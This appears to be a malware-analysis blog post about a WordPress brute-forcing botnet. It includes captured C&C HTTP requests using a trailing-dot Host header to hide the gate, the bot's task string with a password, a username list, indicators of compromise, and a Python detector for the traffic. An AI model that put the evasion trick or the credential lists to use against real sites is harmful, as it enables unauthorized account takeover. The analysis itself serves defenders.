Resolved google-analytics.pw to 89.45.14.74
Yet another WordPress brute-forcing botnet. This one differs from the previously posted one in that it uses HTTP to talk to its C&C server.
It gets a bit tricky, as it tries to hide its gate by sending
Host: google-analytics.pw.
in the request instead of
Host: google-analytics.pw
Here is a correct request (with the trailing dot) and the gate's reply:
GET /cmd.php HTTP/1.0
Host: google-analytics.pw.
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

HTTP/1.1 200 OK
Date: Sun, 08 Sep 2013 18:59:04 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 67
Connection: close
Content-Type: text/html; charset=UTF-8

1 30 hxxp://google-analytics.pw/pass_bot_pull/952536.txt steven 480
952536.txt (mirror) is a list of 5000 WordPress sites for the bot to try to brute force using the password "steven".
The usernames to try are fetched from the server in the same way as the gate file:
GET /login.txt HTTP/1.0
Host: google-analytics.pw.
Keep-Alive: 300
Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; Synapse)

HTTP/1.1 200 OK
Date: Sun, 08 Sep 2013 18:59:06 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 04 Sep 2013 21:47:35 GMT
ETag: "a0434-ab-4e595c0dfad70"
Accept-Ranges: bytes
Content-Length: 171
Connection: close
Content-Type: text/plain; charset=UTF-8

Administrator admin adm system service user user1 user2 user3 temp tester office director manager test support root .......................... ..........
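As an added illustration (not code from this post), here is a small Python detector that parses requests like the two above, flags the trailing-dot Host trick and the Synapse User-Agent, normalizes the host so a blocklist still matches, and decodes the task string returned by /cmd.php. The CRLF framing of the sample request and the names given to the three unexplained numeric fields are assumptions.

```python
# Constructed sample of the gate request shown in the post (CRLF framing is an assumption).
SAMPLE_REQUEST = (
    "GET /cmd.php HTTP/1.0\r\n"
    "Host: google-analytics.pw.\r\n"
    "Keep-Alive: 300\r\n"
    "Connection: keep-alive\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Synapse)\r\n"
    "\r\n"
)
# Constructed copy of the 67-byte task body that /cmd.php returns (URL kept defanged).
SAMPLE_TASK = "1 30 hxxp://google-analytics.pw/pass_bot_pull/952536.txt steven 480"

def parse_request(raw):
    """Split a raw HTTP request into a header map keyed by lower-cased name."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers = {"_request_line": head[0]}
    for line in head[1:]:
        name, _, value = line.partition(":")
        if value:
            headers[name.strip().lower()] = value.strip()
    return headers

def normalize_host(host):
    """Drop any port and the trailing dot so 'google-analytics.pw.' matches a blocklist."""
    return host.split(":", 1)[0].rstrip(".").lower()

def suspicious_indicators(headers, c2_hosts=("google-analytics.pw",)):
    """Return the reasons a request resembles this botnet's gate traffic."""
    reasons = []
    host = headers.get("host", "")
    if host.endswith("."):
        # A trailing dot is legal FQDN syntax, so alone it is weak evidence, but it
        # slips past a filter that compares the Host header literally.
        reasons.append("trailing dot in Host header")
    if normalize_host(host) in c2_hosts:
        reasons.append("Host matches known C&C domain after normalization")
    if "Synapse" in headers.get("user-agent", ""):
        reasons.append("Synapse (Pascal socket library) User-Agent")
    return reasons

def parse_task(body):
    """Parse '1 30 <target list url> <password> 480'. The post explains only the
    URL and password fields; the three numeric fields are kept as opaque strings."""
    fields = body.split()
    if len(fields) != 5:
        raise ValueError("unexpected task format: %r" % body)
    return {"num1": fields[0], "num2": fields[1], "target_list_url": fields[2],
            "password": fields[3], "num3": fields[4]}
```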
The pcap file from malwr.com is here, if anyone wants a more detailed look.
Hosting info: http://whois.domaintools.com/89.45.14.74
Related md5s (Search on malwr.com to download samples)
Wordpress bruteforcer: 2fd2ac4dc99709fbac3fee09a9e92178
EDIT: This is apparently part of the "Fort Disco" campaign.